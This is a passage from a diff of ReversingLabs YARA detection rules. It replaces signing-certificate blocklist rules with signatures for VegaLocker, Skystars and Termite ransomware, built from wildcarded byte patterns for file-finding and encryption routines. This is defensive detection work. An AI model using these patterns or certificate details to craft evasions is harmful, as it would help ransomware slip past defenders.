?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 + DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 00 00 + DE ?? 26 00 00 DE ?? 00 DC 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "sasha catering ltd" and pe.signatures[i].serial=="3e:79:55:31:b3:26:55:10:f9:35:18:7e:ca:59:92:0a" and 1557243644<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($setup_env) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_8F40B1485309A064A28B96Bfa3F55F36 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Vegalocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects VegaLocker ransomware." author = "ReversingLabs" - id = "bad5b57e-185a-5872-9817-a7d688e24fe7" - date = "2023-11-08" - modified = "2023-11-08" + id = "53eec8d1-bab0-5556-92c0-1b70eb763fa5" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3194-L3212" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "58dd47bfd2acd698bc27fb03eb51e4b8598ef6c71f7193e3cc4eea63982855f0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.VegaLocker.yara#L1-L100" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8616e72fc435676179e83a304d4111c8f29ebf3cd79ff5b2d229cca8fc97c2a3" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "VegaLocker" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? + ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74 + ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 + ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ?? + ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84 + ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6 + 03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03 + C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45 + ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + 8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3 + 48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85 + ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D + ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8D 45 ?? E8 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 + FF 30 64 89 20 C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 + ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68 + ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 + 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? + 33 D2 8B 45 ?? 8B 08 FF 51 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B + 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C6 + 85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 + 64 89 10 EB ?? E9 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 + } + $encrypt_files_p2 = { + 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ?? + A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 + ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ?? + 0F 8E ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB + ?? 7E ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? + ?? 8D 45 ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ?? + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? + ?? 8D 45 ?? E8 ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? + ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 83 + BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA + } + $encrypt_files_p3 = { + E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? + EB ?? 8D 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B + 08 FF 51 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? + E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ?? + ?? ?? 59 EB ?? 55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? + ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? + ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? + 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Singh Agile Content Design Limited" and (pe.signatures[i].serial=="00:8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36" or pe.signatures[i].serial=="8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36") and 1542585600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_B2120Facadbb92Cc0A176759604C6A0F : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Skystars : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Skystars ransomware." author = "ReversingLabs" - id = "8a90cc61-4d39-58eb-a102-c22d096d99ae" - date = "2023-11-08" - modified = "2023-11-08" + id = "9dc19bda-c5bd-58fb-8c4f-a7d8a6fbbce9" + date = "2020-11-20" + modified = "2020-11-20" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3214-L3232" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "08462b1bd3d45824aeea901a4db19365c28d8b8b0f594657df7a59250111729b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Skystars.yara#L1-L97" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "352d22183b0974908ce684725fe85b4714ac5959c3bddf093b54383195881a5a" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Skystars" + tc_detection_factor = 5 importance = 25 + strings: + $search_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? + 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 + 6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB + 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? + 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? + ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? + ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D + ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? + 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A + ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? + 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33 + } + $search_files_p2 = { + B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? + ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? + 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 + ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? + ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? + ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D ?? FF + 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D + ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? + 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 + ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 + } + $encrypt_files = { + 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 + 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 + ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF + 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 68 ?? ?? + ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? + ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? + 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? + ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? + 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 + 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 + 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? + ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 + ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 + } + $main_routine = { + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 + ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? + ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D + ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 + E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 89 45 + ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? + ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? + 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SLON LTD" and (pe.signatures[i].serial=="00:b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f" or pe.signatures[i].serial=="b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f") and 1554249600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($main_routine) and ( all of ($search_files_p*)) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4F407Eb50803845Cc43937823E1344C0 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Termite : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Termite ransomware." author = "ReversingLabs" - id = "6989cda1-f28e-58b7-8572-a7dc2e84d9e3" - date = "2023-11-08" - modified = "2023-11-08" + id = "350011fa-1e3c-5079-8fe7-968340a3aca0" + date = "2020-08-31" + modified = "2020-08-31" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3234-L3250" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4d5a2b0619be902d8a437f204ae1b87222c73d3186930809b1f694bad429aea8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Termite.yara#L1-L151" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "df273de81fc58cb0bacf021ee539ec6dbfa1f1a3e13bd46519ee313595cafb4c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Termite" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SLOW COOKED VENTURES LTD" and pe.signatures[i].serial=="4f:40:7e:b5:08:03:84:5c:c4:39:37:82:3e:13:44:c0" and 1556555362<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6922Bb5De88E4127E1Ac6969E6A199F5 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "86e16068-8b0b-5f0f-af5e-5ee9f518a915" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3252-L3268" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "39dbaa232ea9125934b3682d780e3821d12e771f2b844d027d99a432fe249d9f" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? + 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 + ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D + ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 8B 1B 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? + 58 8B 5D ?? 89 03 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D + ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? + ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 + C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 + 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? + B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B + 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 + } + $find_files_p2 = { + 83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 94 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? + ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? + ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 